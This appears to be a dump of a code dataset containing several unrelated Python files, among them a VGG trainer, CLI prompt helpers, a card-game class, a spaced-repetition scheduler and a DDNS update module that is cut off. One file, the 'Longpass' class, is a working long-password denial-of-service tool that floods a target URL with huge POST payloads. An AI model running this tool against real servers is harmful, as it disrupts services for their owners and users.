text stringlengths 38 1.54M |
|---|
# Global index used by the (buggy) helper functions below; starts at 0.
i = 0
# Sample dataset: each record is [label, value1, value2].
data = (['1',1.0,1.0],['2',1.5,2.0],
        ['3',3.0,4.0],['4',5.0,7.0],
        ['5',3.5,5.0],['6',4.5,5.0],
        ['7',3.5,4.5])
def tampil_data(data):
    """Print every record of *data*, one per line.

    Fixed: the original iterated over the global ``i`` (an int, raising
    TypeError) and used Python 2 print-statement syntax.
    """
    for record in data:
        print(record)
def banyak_data(data):
    """Return the number of records in *data*.

    Fixed: the original looped over the global ``i`` (an int), which raised
    TypeError; counting the elements of *data* was clearly the intent, and
    ``len`` does it directly.
    """
    return len(data)
def random(awal, akhir):
    """Return a random integer in the inclusive range [awal, akhir].

    NOTE(review): the original body ``(awal, akhir).random()`` was not valid
    Python, and the digit string it built was unused.  A uniform random draw
    between the two bounds appears to be the intent -- confirm against
    callers before relying on this.
    """
    # Local import because this function shadows the stdlib module name.
    import random as _random
    return _random.randint(awal, akhir)
def x(data1, c_1, data2, c_2):
    """Placeholder restored from an incomplete original.

    NOTE(review): the original body was the syntactically invalid fragment
    ``bil_awal=`` followed by ``print(tampil_data(data))``; the intended
    computation is unknown.  This version keeps the print call and makes the
    function valid Python so the module can at least be imported.
    """
    bil_awal = None  # TODO: the original assignment was left unfinished
    print(tampil_data(data))
|
#!/usr/bin/env python3
import logging
import sys
logging.debug(str(sys.version_info))
# Tuple comparison handles all future major versions correctly; the original
# "[0] < 3 or [1] < 5" test would wrongly reject e.g. Python 4.0.
if sys.version_info < (3, 5):
    raise Exception("Requires python 3.5+, try module load python/3.6-anaconda-4.4")
import readline
def ask(prompt:str, guess:str="", insist=True) -> str:
    """Prompt the user for a line of input, pre-filling the line with *guess*.

    When *insist* is true, re-prompt until a non-empty answer is entered;
    otherwise the first response (even an empty one) is accepted.
    """
    readline.set_startup_hook(lambda: readline.insert_text(guess))
    try:
        while True:
            answer = input(prompt)
            if answer != '' or not insist:
                return answer
    finally:
        # Always remove the pre-fill hook, even on KeyboardInterrupt.
        readline.set_startup_hook()
from typing import List
def select(prompt:str, options:List, *additional:str) -> str:
    """Ask the user to pick one entry from *options* by its 1-based number,
    or to type one of the extra keywords given in *additional*.

    Returns the chosen option object itself, or the matched keyword string.
    """
    print(prompt)
    if not options:
        print("(nothing available)")
    logging.debug("selecting from: " + str(options))
    for idx, option in enumerate(options):
        logging.debug("option {0} is {1}".format(str(idx), str(option)))
        print("{0:>3d}: {1}".format(idx + 1, str(option)))
    print("Selection: ")
    while True:
        choice = input()
        if choice in additional:
            return choice
        try:
            number = int(choice) - 1  # offset back to 0-based
        except ValueError:
            number = -1  # invalid text: force a retry below
        if 0 <= number < len(options):
            return options[number]
        keywords = ', '.join([c for c in additional])
        print("Not a valid selection, please select a number from the list above or one of: " + keywords)
def multi_select(prompt:str, options:List, *additional:str) -> List[str]:
    """Ask the user to choose options by number, and accept multiple options
    as a space-separated list.

    Returns the list of chosen option objects / keyword strings.

    Fixed two defects in the original:
    - a non-numeric entry raised an uncaught ValueError instead of retrying
      (the sibling select() already handled this case);
    - the range check accepted ``len(options)+1``, which indexed past the
      end of the list and raised IndexError.
    """
    print(prompt)
    for i in range(len(options)):
        print("{0:>3d}: {1}".format(i+1, str(options[i])))
    print("To select multiple items, please use spaces to separate them")
    print("Selections: ")
    while True:
        result = []
        choices = input().split()
        for choice in choices:
            if choice in additional:
                result.append(choice)
                continue
            try:
                ichoice = int(choice)
            except ValueError:
                ichoice = 0  # falls through to the error message below
            if 1 <= ichoice <= len(options):
                result.append(options[ichoice-1])
                continue
            print("{0} is not a valid selection, please try again".format(choice))
            break
        else:
            return result  # all were valid
def truefalse(prompt, default=False):
    """Ask a yes/no question and return the answer as a bool.

    The input line is pre-filled with 'Y' or 'N' derived from *default*;
    unrecognised answers trigger a re-prompt.

    Fixed: the original computed ``guess`` but then pre-filled
    ``str(default)`` ("True"/"False") instead, leaving the variable unused;
    the 'Y'/'N' pre-fill was clearly the intent.
    """
    guess = 'Y' if default else 'N'
    readline.set_startup_hook(lambda: readline.insert_text(guess))
    try:
        while True:
            response = input(prompt)
            if response.lower() in ('yes', 'y', 'true', 't'):
                return True
            elif response.lower() in ('no', 'n', 'false', 'f'):
                return False
            else:
                prompt = "invalid response, please enter Y or N"
    finally:
        readline.set_startup_hook()
|
# Copyright (c) Alibaba, Inc. and its affiliates.
from modelscope.trainers.hooks import HOOKS, Priority
from modelscope.trainers.hooks.lr_scheduler_hook import LrSchedulerHook
from modelscope.utils.constant import LogKeys
@HOOKS.register_module(module_name='AddLrLogHook')
class AddLrLogHook(LrSchedulerHook):
    """For EasyCV to adapt to ModelScope, the lr log of EasyCV is added in the trainer,
    but the trainer of ModelScope does not and it is added in the lr scheduler hook.
    But The lr scheduler hook used by EasyCV is the hook of mmcv, and there is no lr log.
    It will be deleted in the future.
    """
    PRIORITY = Priority.NORMAL
    def __init__(self):
        # Deliberately does NOT call LrSchedulerHook.__init__: this hook only
        # logs the learning rate and sets up no scheduler state of its own.
        pass
    def before_run(self, trainer):
        # No setup needed; overrides the parent to make it a no-op.
        pass
    def before_train_iter(self, trainer):
        # Record the current learning rate so it shows up in the iter logs.
        trainer.log_buffer.output[LogKeys.LR] = self._get_log_lr(trainer)
    def before_train_epoch(self, trainer):
        # Same as before_train_iter, for epoch-level logging.
        trainer.log_buffer.output[LogKeys.LR] = self._get_log_lr(trainer)
    def after_train_epoch(self, trainer):
        # NOTE(review): overriding with a no-op presumably suppresses the
        # parent's epoch-end behaviour -- confirm against LrSchedulerHook.
        pass
|
import torch
import torchvision
import torchvision.transforms as transforms
import math
import matplotlib.pyplot as plt
import numpy as np
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import os
# VGG layer configurations (torchvision convention): each number is a conv
# layer's output-channel count, 'M' marks a max-pool.
# 'A'=VGG11, 'B'=VGG13, 'D'=VGG16, 'E'=VGG19.
cfg = {
    'A': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
    'B': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
    'D': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],
    'E': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'],
}
def load_data(DATA_PATH, BATCH_SIZE):
    """Build CIFAR-10 train/test DataLoaders rooted at DATA_PATH.

    Returns (trainloader, testloader).

    Fixes relative to the original:
    - transforms.RandomSizedCrop was deprecated long ago and removed from
      torchvision; RandomResizedCrop is the drop-in replacement.
    - the random augmentations (crop/flip) are now applied to the training
      set only; the test set gets a deterministic Resize+CenterCrop so
      evaluation is reproducible.
    """
    normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
                                     std=[0.229, 0.224, 0.225])
    train_transform = transforms.Compose([
        transforms.Resize(512),
        transforms.RandomResizedCrop(256),
        transforms.RandomHorizontalFlip(),
        transforms.ToTensor(),
        normalize, ])
    test_transform = transforms.Compose([
        transforms.Resize(512),
        transforms.CenterCrop(256),
        transforms.ToTensor(),
        normalize, ])
    trainset = torchvision.datasets.CIFAR10(root=DATA_PATH, train=True,
                                            download=True, transform=train_transform)
    trainloader = torch.utils.data.DataLoader(trainset, batch_size=BATCH_SIZE,
                                              shuffle=True, num_workers=2)
    testset = torchvision.datasets.CIFAR10(root=DATA_PATH, train=False,
                                           download=False, transform=test_transform)
    testloader = torch.utils.data.DataLoader(testset, batch_size=BATCH_SIZE,
                                             shuffle=False, num_workers=2)
    return trainloader, testloader
## Dataloader
# functions to show an image
def imgshow(img):
    """Undo the (-1, 1) normalisation and display tensor *img* (C, H, W)."""
    unnormalized = img / 2 + 0.5
    # matplotlib expects channels last, so move C from axis 0 to axis 2.
    plt.imshow(np.transpose(unnormalized.numpy(), (1, 2, 0)))
    plt.show()
class VGG(nn.Module):
    """VGG classifier head on top of a provided feature extractor.

    feature: an nn.Module (see layerbuild) whose output flattens to
        512*7*7 values per sample -- assumes 224x224-style inputs with the
        standard VGG pooling stack; TODO confirm against callers.
    num_classes: size of the final classification layer.
    init_weights: apply the initialisation scheme in _initialize_weights.

    NOTE(review): 'classfier' is a misspelling of 'classifier', kept as-is
    because renaming the attribute would break external users.  The print()
    calls in _initialize_weights look like leftover debugging output.
    """
    def __init__(self,feature,num_classes=1000,init_weights=True):
        super(VGG,self).__init__()
        self.feature=feature
        self.classfier=nn.Sequential(
            #FC-4096
            nn.Linear(512*7*7,4096),
            # nn.ReLU(inplace=True)
            nn.LeakyReLU(inplace=True),
            nn.Dropout(),
            #FC-4096
            nn.Linear(4096,4096),
            nn.ReLU(True),
            nn.Dropout(),
            #FC-1000
            nn.Linear(4096,num_classes),
        )
        if init_weights:
            self._initialize_weights()
    def _initialize_weights(self):
        # He-style normal init for convs, constant for BN, small normal for
        # Linear layers; prints each module's weights before/after (debug).
        for m in self.modules():
            print(m,'\n')
            if isinstance(m, nn.Conv2d):
                # fan-out term used as the He-init variance denominator
                n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
                print('conv2d:\n',m.weight.data)
                m.weight.data.normal_(0, math.sqrt(2. / n))
                print('Modified conv2d:\n',m.weight.data)
                if m.bias is not None:
                    m.bias.data.zero_()
            elif isinstance(m, nn.BatchNorm2d):
                print('BN:\n',m.weight.data)
                m.weight.data.fill_(1)
                m.bias.data.zero_()
                print('Modified BN:\n',m.weight.data)
            elif isinstance(m, nn.Linear):
                print('Linear:\n',m.weight.data)
                m.weight.data.normal_(0, 0.01)
                m.bias.data.zero_()
                print('Modified Linear:\n',m.weight.data)
    def forward(self,x):
        # features -> flatten per sample -> classifier logits
        x=self.feature(x)
        x=x.view(x.size(0),-1)
        x=self.classfier(x)
        return x
def layerbuild(cfg, batch_normal=False, in_channels=3, layer=None):
    """Build the VGG feature extractor described by *cfg*.

    cfg: list of conv output-channel counts, with 'M' marking a max-pool.
    batch_normal: insert a BatchNorm2d after each conv when True.
    in_channels: channel count of the network input (3 for RGB).
    layer: optional pre-existing list to append the modules to.

    Returns an nn.Sequential of the assembled layers.

    Fixed: the original used a mutable default argument (``layer=[]``), so
    every call after the first silently appended to the same shared list and
    returned an ever-growing network.
    """
    assert cfg is not None, 'Invalid CFG Info'
    if layer is None:
        layer = []
    for layer_config in cfg:
        if layer_config == 'M':
            layer.append(nn.MaxPool2d(kernel_size=3, stride=2))
        else:
            layer.append(nn.Conv2d(in_channels, layer_config,
                                   kernel_size=3, padding=1))
            if batch_normal:
                layer.append(nn.BatchNorm2d(layer_config))
            layer.append(nn.ReLU(inplace=True))
            # Next conv consumes this layer's output channels.
            in_channels = layer_config
    return nn.Sequential(*layer)
def vgg16_bn(**kwargs):
    """Construct a VGG16 model with batch normalisation (config 'D')."""
    print(cfg['D'])
    features = layerbuild(cfg['D'], batch_normal=True)
    return VGG(features, **kwargs)
def train(traindata, testdata, LearningRate=0.1):
    """Run one SGD pass of a VGG16-BN model over *traindata* on GPU 0.

    testdata is currently unused; it is kept for interface compatibility.

    Fixes relative to the original:
    - ``labels.cuda(async=True)`` is a SyntaxError on Python 3.7+ because
      ``async`` became a keyword; ``non_blocking=True`` is the replacement.
    - the deprecated torch.autograd.Variable wrappers were removed; plain
      tensors carry autograd since PyTorch 0.4.
    """
    os.environ['CUDA_VISIBLE_DEVICES'] = '0'
    use_cuda = torch.cuda.is_available()
    global best
    criterion = nn.CrossEntropyLoss()
    model = vgg16_bn()
    model.train()
    optimizer = optim.SGD(model.parameters(), lr=LearningRate)
    model.cuda(device=0)
    for batch_id, (inputs, labels) in enumerate(traindata):
        print('Batch : No .', batch_id, '\n')
        inputs, labels = inputs.cuda(), labels.cuda(non_blocking=True)
        print(inputs.shape)
        outputs = model(inputs)
        loss = criterion(outputs, labels)
        losscpu = loss.cpu()
        print('loss', losscpu)
        # prec1,prec5=accura
        # compute gradient and do SGD step
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
def main():
    """Entry point: build CIFAR-10 loaders and run training.

    (The commented-out image-preview code from the original was removed;
    imgshow() can still be used interactively for the same purpose.)
    """
    classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
    data_path = '/run/user/1000/gvfs/smb-share:server=192.168.31.1,share=xiaomi-usb0/DataSet/'
    batch_size = 4
    trainloader, testloader = load_data(data_path, batch_size)
    train(trainloader, testloader)
if __name__ == '__main__':
    main()
|
HAND_LIMIT = 10  # maximum number of cards a Hand may hold
class Hand(object):
    """A hand of cards, capped at HAND_LIMIT entries."""
    def __init__(self):
        self.side = None      # owning side/player, assigned externally
        self.cards = []       # the cards currently held
        self.size = 0         # kept in sync with len(self.cards)
        self.board = None     # board this hand belongs to, assigned externally
        self.hidden = False   # when True, __str__ masks the cards
    def get_card(self, pos):
        """Return the card at the pos (idx+1) specified."""
        return self.cards[pos - 1]
    def get_playable_cards(self):
        """Return a list of the cards that can be played."""
        return [card for card in self.cards if card.can_play()]
    def get_playable_card_positions(self):
        """Return the position (idx+1) of the cards that can be played."""
        return [idx + 1 for idx, card in enumerate(self.cards) if card.can_play()]
    def add_card(self, card):
        """A 'card' is either a Spell, Weapon, or Character."""
        if len(self.cards) >= HAND_LIMIT:
            raise Exception("Too many Cards.")
        self.cards.append(card)
        self.size += 1
        card.hand = self
    def remove_card(self, card):
        """Remove *card*; raises if it is not in this hand."""
        if card not in self.cards:
            raise Exception("%s not in this hand. %s" % (card.name, str(self)))
        self.cards.remove(card)
        self.size -= 1
    def is_full(self):
        """True once the hand has reached HAND_LIMIT cards."""
        return self.size >= HAND_LIMIT
    def __str__(self):
        if not self.cards:
            return "Empty"
        if self.hidden:
            return "".join("| ??? |" for _ in self.cards)
        pieces = []
        for card in self.cards:
            prefix = "*" if card.can_play() else ""
            pieces.append(prefix + "|{%d} %s| " % (card.contents.manaCost,
                                                   card.contents.name))
        return "".join(pieces)
|
# Smoke-test script for the `requests` library: prints the platform, then
# fetches a JSON endpoint and shows equivalent ways of decoding the body.
import platform
import requests
print(platform.platform())
# The triple-quoted block below is a commented-out earlier experiment
# against zhihu.com, kept as an inert string literal.
"""response = requests.get("https://www.zhihu.com")
print(type(response))
print(response.status_code)
print(type(response.text))
print(response.text)
print(response.cookies)
print(response.content)
print(response.content.decode("utf-8"))
response.encoding="utf-8"
print(response.text)
"""
import requests  # NOTE(review): duplicate of the import above; harmless but redundant
import json
response = requests.get("https://httpbin.org/get")
print(type(response.text))      # raw body is a str
print(response.json())          # built-in JSON decoding
print(json.loads(response.text))  # equivalent manual decoding
print(type(response.json()))
from agente.agente import Agente
from modelos.card import Card
from modelos.estudo import Estudo
from modelos.respostausuario import RespostaUsuario
from datetime import datetime
from datetime import timedelta
from modelos_matematicos.formula_repeticao.formula_repeticao import calcular_oi
class Ambiente:
    """Environment that schedules the next spaced-repetition review of a card.

    Fixed: the original compared small ints with ``is``/``is not`` (identity),
    which relies on CPython's int caching and emits a SyntaxWarning on 3.8+;
    ``==``/``!=`` express the intended value comparison.
    Comments were also translated to English.
    """
    __agente__: Agente
    def __init__(self):
        self.__agente__ = Agente()
    def obter_proxima_repeticao(self, api_object):
        """Compute the new difficulty and next repetition date from the API payload."""
        resposta_usuario = RespostaUsuario(
            api_object['timeForResolution'],
            api_object['isRight']
        )
        estudo_corrente = Estudo(
            Card(
                api_object['card']['id'],
                api_object['card']['difficulty'],
                api_object['card']['tag']['id']
            ),
            datetime.strptime(api_object['lastRepetition'], '%b %d, %Y %I:%M:%S %p'),
            datetime.strptime(api_object['currentDate'], '%b %d, %Y %I:%M:%S %p'),
            api_object['numberOfRepetitions'],
            False,
            api_object['isRight']
        )
        id_estudante = api_object['student']['id']
        recompensa = None
        # Only repetitions after the first produce a reward signal.
        if estudo_corrente.numero_repeticao != 1:
            recompensa = self.__calcular_recompensa__(resposta_usuario, estudo_corrente)
        novo_ef = self.__agente__.tomar_acao(id_estudante, recompensa, estudo_corrente)
        proxima_repeticao = self.__calcular_proxima_repeticao__(estudo_corrente)
        estudo_completado = self.__verificar_estudo_completado__(estudo_corrente.data_ultima_repeticao, proxima_repeticao)
        return {
            "card": {
                "id": estudo_corrente.card.id,
                "difficulty": novo_ef,
            },
            "completed": estudo_completado,
            "nextRepetition": proxima_repeticao.strftime("%b %d, %Y %I:%M:%S %p"),
        }
    def __calcular_recompensa__(self, resposta: RespostaUsuario, estudo_corrente: Estudo):
        """Reward: -1 for a wrong answer, otherwise interval * (repetition / answer time)."""
        if resposta.acerto is False:
            return -1
        intervalo = (estudo_corrente.data_proxima_repeticao - estudo_corrente.data_ultima_repeticao).days
        repeticao = estudo_corrente.numero_repeticao
        tempo_resposta = resposta.tempo_resposta
        return round((intervalo * (repeticao / tempo_resposta)), 5)
    def __calcular_proxima_repeticao__(self, estudo: Estudo):
        """Pick the next repetition datetime for *estudo*."""
        if estudo.acerto_ultima_repeticao is False:
            # Wrong answer: the next repetition is scheduled for tomorrow.
            return datetime.now() + timedelta(days=1)
        else:
            # Right answer: space by the difference between the optimal
            # intervals of repetitions R and R-1.  The ef is not altered
            # here, only passed through as a parameter.
            ef = estudo.card.ef
            diferenca_em_dias = self.__calcular_intervalo_em_dias__(ef, estudo.numero_repeticao)
            return datetime.now() + diferenca_em_dias
    def __calcular_intervalo_em_dias__(self, ef: float, repeticao: int):
        """Optimal interval for repetition R, or its delta from R-1 when R > 1."""
        if repeticao == 1:
            return calcular_oi(ef, repeticao)
        else:
            return calcular_oi(ef, repeticao) - calcular_oi(ef, repeticao - 1)
    def __verificar_estudo_completado__(self, ultima_repeticao, proxima_repeticao):
        """A study is complete once the repetition gap reaches two years (730 days)."""
        return (proxima_repeticao - ultima_repeticao).days >= 730
    def __montar_resposta__(self, novo_ef, data_proxima_repeticao, estudo_foi_completado):
        """Assemble the API response dict (apparently unused; kept for compatibility)."""
        return {
            "card":{
                "difficulty": novo_ef
            },
            "nextRepetition": data_proxima_repeticao.strftime("%b %d, %Y %I:%M:%S %p"),
            "completed": estudo_foi_completado
        }
import sys
import asyncio
import aiohttp
import time
from random import choice
from string import ascii_letters
from termcolor import colored
class Longpass:
    """Long-password denial-of-service tester.

    Schedules ``repeats`` staggered POST requests whose 'password' field is a
    very large random string, rendering a simple line-based progress UI.

    Fixes relative to the original:
    - tasks/payload/ui were mutable *class* attributes shared by every
      instance; they are now created per-instance in __init__.
    - ``aiohttp.post`` was removed from aiohttp years ago; requests now go
      through an aiohttp.ClientSession.
    - run() drew the "Scheduled" line at UI position i+4 while makeRequest()
      updated position i+3; both now use i+3.
    - the coroutines are driven with a fresh event loop and asyncio.gather
      (passing bare coroutines to asyncio.wait was removed in Python 3.11),
      and 'id' no longer shadows the builtin.
    """
    url = ""
    delay = 1
    username = ""
    size = 1000000
    repeats = 20
    password = ""
    iterations = 0
    response_time = 0
    def __init__(self):
        # Fresh mutable state per instance (previously shared class attrs).
        self.tasks = list()
        self.payload = dict()
        self.ui = list()
    def run(self):
        """Generate the payload and fire the staggered requests."""
        self.updateUI(2, "Generating the password...")
        password = self.generatePassword(self.size)
        self.updateUI(2, "Done!\n")
        # Set the POST payload
        # @todo Add an ability to set a custom variable name for the "password" DOS payload variable
        self.payload['password'] = password
        password = None  # drop the local reference to the huge string
        loop = asyncio.new_event_loop()
        # Add requests to the task list; UI position 3+i matches the
        # position makeRequest() later updates for the same request.
        for i in range(self.repeats):
            delay = i * self.delay
            self.updateUI(3 + i, colored("Request " + str(i+1) + ": Scheduled...", 'grey'))
            self.tasks.append(self.makeRequest(delay, i, loop))
        try:
            loop.run_until_complete(asyncio.gather(*self.tasks))
        finally:
            loop.close()
    def generatePassword(self, size):
        """Return a random string of ascii letters of length *size*."""
        return "".join(choice(ascii_letters) for i in range(size))
    def clear(self):
        """Clear the terminal and move the cursor to the top-left corner."""
        sys.stdout.write('\033[2J')
        sys.stdout.write('\033[H')
        sys.stdout.flush()
    def updateUI(self, position, txt):
        """Set UI line *position* to *txt* (EAFP style) and redraw everything."""
        try:
            self.ui[position] = txt
        except IndexError:
            self.ui.insert(position, txt)
        self.clear()
        for msg in self.ui:
            sys.stdout.write(msg + "\n")
    def progress(self, step):
        """Advance the completion counter and redraw the percentage line."""
        self.iterations += step
        # Warning colours as the server response time degrades.
        color = 'white'
        if self.response_time >= 6:
            color = 'yellow'
        if self.response_time >= 20:
            color = 'red'
        percentage = colored("\n" + str(round((self.iterations / (self.repeats * 2)) * 100, 1)) + "% done", 'white', attrs=['bold']) + " - "
        response = "Server response time: " + colored(str(round(self.response_time, 4)), color, attrs=['bold']) + " sec"
        self.updateUI(self.repeats + 3, percentage + response)
    async def makeRequest(self, delay, i, loop):
        """Make an asynchronous POST request after *delay* seconds.

        *loop* is unused but kept for interface compatibility.
        """
        await asyncio.sleep(delay)
        position = 3 + i                 # UI line for this request
        req_id = "Request " + str(i+1)   # renamed: 'id' shadowed the builtin
        self.updateUI(position, colored(req_id + ": Sending request...", 'yellow'))
        self.progress(1)
        start = time.time()
        try:
            async with aiohttp.ClientSession() as session:
                async with session.post(self.url, data=self.payload) as response:
                    await response.read()
        except Exception as e:
            self.clear()
            sys.exit(colored(e, 'red'))
        self.progress(1)
        duration = time.time() - start
        self.response_time = duration
        self.updateUI(position, colored(req_id + ": Done, server response time " + str(round(duration, 2)) + " seconds.", 'green', attrs=['bold']))
|
from xml.dom.minidom import parse
import matplotlib.pyplot as plt
def getCorner(xmlParse, cornerName):
    """Return [x, y] (as floats) of the first element named *cornerName*."""
    node = xmlParse.getElementsByTagName(cornerName)[0]
    return [float(node.getAttribute('x')), float(node.getAttribute('y'))]
def minusCoords(coord1, coord2):
    """Component-wise difference coord1 - coord2 for two [x, y] coords."""
    return [coord1[0] - coord2[0], coord1[1] - coord2[1]]
def getLineStroke(xmlFileName):
    """Parse an IAM-OnDB stroke XML file into a list of [x, y, end] points.

    Coordinates are shifted so x starts at 0 and the y axis points upward;
    the third element is 1 on the last point of each stroke, 0 otherwise.
    """
    doc = parse(xmlFileName)
    location = doc.getElementsByTagName('SensorLocation')[0].getAttribute('corner')
    assert location == 'top_left'
    bot_right = getCorner(doc, 'DiagonallyOppositeCoords')
    bot_left = getCorner(doc, 'VerticallyOppositeCoords')
    top_right = getCorner(doc, 'HorizontallyOppositeCoords')
    # Fourth corner derived from the other three (kept for reference).
    top_left = [bot_left[0], top_right[1]]
    inputSeq = []
    for stroke in doc.getElementsByTagName('Stroke'):
        for point in stroke.getElementsByTagName('Point'):
            x = float(point.getAttribute('x')) - bot_left[0]   # start from 0
            y = bot_right[1] - float(point.getAttribute('y'))  # invert up/down
            inputSeq.append([x, y, 0])
        inputSeq[-1][-1] = 1  # mark the stroke's final point
    return inputSeq
if __name__ == '__main__':
    testXml = "/home/lau/homework/IAM_OnDB/lineStrokes/a01/a01-000/a01-000u-05.xml"
    inputs = getLineStroke(testXml)
    # Fixed: the original used the Python 2 ``print >> file`` syntax and
    # never closed the output file; a context manager handles both.
    with open("testOut.txt", 'w') as ofile:
        for point in inputs:
            print(point, file=ofile)
    # Plot each stroke as a black polyline, starting a new line at each
    # end-of-stroke marker.
    x = []
    y = []
    plt.figure(1)
    plt.xlim(0, 7000)
    plt.ylim(0, 7000)
    for line in inputs:
        x.append(line[0])
        y.append(line[1])
        if line[2] == 1:
            plt.plot(x, y, 'k')
            x = []
            y = []
    plt.show()
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from time import time
def test():
    """Time the O(n*m) nested-loop list intersection inside a function scope.

    Fixed: Python 2 print statements converted to the print() function
    (output text is unchanged).
    """
    t = time()
    lista = [1,2,3,4,5,6,7,8,9,13,34,53,42,44]
    listb = [2,4,6,9,23]
    intersection = []
    for i in range(1000000):
        for a in lista:
            for b in listb:
                if a == b:
                    intersection.append(a)
    print("list in func(test), total run time:", time()-t)
def test_set():
    """Time the set-based intersection inside a function scope.

    Fixed: Python 2 print statement converted to the print() function
    (output text is unchanged).
    """
    t = time()
    lista = [1,2,3,4,5,6,7,8,9,13,34,53,42,44]
    listb = [2,4,6,9,23]
    intersection = []
    for i in range(1000000):
        intersection.append(list(set(lista)&set(listb)))
    print("set in func(test_set), total run time:", time()-t)
# Repeat the same two benchmarks at module top level (no function scope),
# then run the function-scoped versions for comparison.
# Fixed: Python 2 print statements converted to print() calls.
t = time()
lista = [1,2,3,4,5,6,7,8,9,13,34,53,42,44]
listb = [2,4,6,9,23]
intersection = []
for i in range(1000000):
    for a in lista:
        for b in listb:
            if a == b:
                intersection.append(a)
print("list not in func, total run time:", time()-t)
##runtime(db6sda8_python2.6.6: 19.9267392159)
t = time()
lista = [1,2,3,4,5,6,7,8,9,13,34,53,42,44]
listb = [2,4,6,9,23]
intersection = []
for i in range(1000000):
    intersection.append(list(set(lista)&set(listb)))
print("set not in func, total run time:", time()-t)
#runtime(db6sda8_python2.6.6: 5.93210506439)
test()
###runtime(db6sda8_python2.6.6: 10.7789461613)
test_set()
###runtime(db6sda8_python2.6.6: 7.41557717323)
|
# Copyright (C) 2012 Internet Systems Consortium.
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND INTERNET SYSTEMS CONSORTIUM
# DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# INTERNET SYSTEMS CONSORTIUM BE LIABLE FOR ANY SPECIAL, DIRECT,
# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING
# FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
# WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
from bundy.dns import *
import bundy.ddns.zone_config
from bundy.log import *
from bundy.ddns.logger import logger, ClientFormatter, ZoneFormatter,\
RRsetFormatter
from bundy.log_messages.libddns_messages import *
from bundy.datasrc import ZoneFinder
import bundy.xfrin.diff
from bundy.acl.acl import ACCEPT, REJECT, DROP
import copy
# Result codes for UpdateSession.handle()
UPDATE_SUCCESS = 0
UPDATE_ERROR = 1
UPDATE_DROP = 2
# Convenient aliases of update-specific section names.  RFC 2136 reuses the
# standard DNS message sections: Zone=Question, Prerequisite=Answer,
# Update=Authority.
SECTION_ZONE = Message.SECTION_QUESTION
SECTION_PREREQUISITE = Message.SECTION_ANSWER
SECTION_UPDATE = Message.SECTION_AUTHORITY
# Shortcut for the commonly used debug level
DBGLVL_TRACE_BASIC = logger.DBGLVL_TRACE_BASIC
class UpdateError(Exception):
    '''Exception for general error in update request handling.

    Intended for internal use within this module: UpdateSession.handle()
    raises it to abort processing of an update request.  It carries context
    that is useful for subsequent logging:
    - msg (string) A string explaining the error.
    - zname (bundy.dns.Name) The zone name. Can be None when not identified.
    - zclass (bundy.dns.RRClass) The zone class. Like zname, can be None.
    - rcode (bundy.dns.RCode or None) The RCODE to be set in the response
      message; this can be None if the response is not expected to be sent.
    - nolog (bool) If True, it indicates there's no more need for logging.
    '''
    def __init__(self, msg, zname, zclass, rcode, nolog=False):
        super().__init__(msg)
        self.zname = zname
        self.zclass = zclass
        self.rcode = rcode
        self.nolog = nolog
def foreach_rr(rrset):
    '''Yield one single-RR RRset per Rdata of the given RRset.

    Usable in calls that need to loop over an RRset and perform an action
    with each of the individual RRs in it.

    Example:
    for rr in foreach_rr(rrset):
        print(str(rr))
    '''
    for rdata in rrset.get_rdata():
        single = bundy.dns.RRset(rrset.get_name(),
                                 rrset.get_class(),
                                 rrset.get_type(),
                                 rrset.get_ttl())
        single.add_rdata(rdata)
        yield single
def convert_rrset_class(rrset, rrclass):
    '''Return a new rrset carrying the data of the given rrset, but of the
    given class.  Useful to convert from NONE and ANY to a real class.

    Note that the caller should be careful what to convert; any DNS error
    that could happen during wire-format reading could technically occur
    here, and is not caught by this helper.
    '''
    converted = bundy.dns.RRset(rrset.get_name(), rrclass,
                                rrset.get_type(), rrset.get_ttl())
    for rdata in rrset.get_rdata():
        # Rdata class is not modifiable and must match its rrset's class, so
        # round-trip each rdata through wire format to rebuild it.  to_text()
        # cannot be used since the class may be unknown.
        wire = rdata.to_wire(bytes())
        converted.add_rdata(bundy.dns.Rdata(rrset.get_type(), rrclass, wire))
    return converted
def collect_rrsets(collection, rrset):
    '''Merge *rrset* into *collection*, grouping by (name, class, type).

    If an RRset with the same name, class and type as the given rrset
    already exists in the collection, the rdata fields of *rrset* are added
    to it; otherwise the rrset itself is appended.  TTL is ignored and rdata
    values are not checked for duplicates.  The collection and its rrsets
    are modified in place; nothing is returned.

    Improvement over the original: the scan stops at the first match instead
    of continuing through the rest of the collection (the grouping invariant
    this function maintains guarantees at most one match).
    '''
    for existing_rrset in collection:
        if existing_rrset.get_name() == rrset.get_name() and\
           existing_rrset.get_class() == rrset.get_class() and\
           existing_rrset.get_type() == rrset.get_type():
            for rdata in rrset.get_rdata():
                existing_rrset.add_rdata(rdata)
            return
    collection.append(rrset)
class DDNS_SOA:
    '''Helpers for handling the SOA record in a DNS update.'''
    def __get_serial_internal(self, origin_soa):
        '''Extract the serial (third field of the SOA rdata) as a Serial.'''
        return Serial(int(origin_soa.get_rdata()[0].to_text().split()[2]))
    def __write_soa_internal(self, origin_soa, soa_num):
        '''Return a copy of origin_soa with its serial replaced by soa_num.'''
        fields = origin_soa.get_rdata()[0].to_text().split()
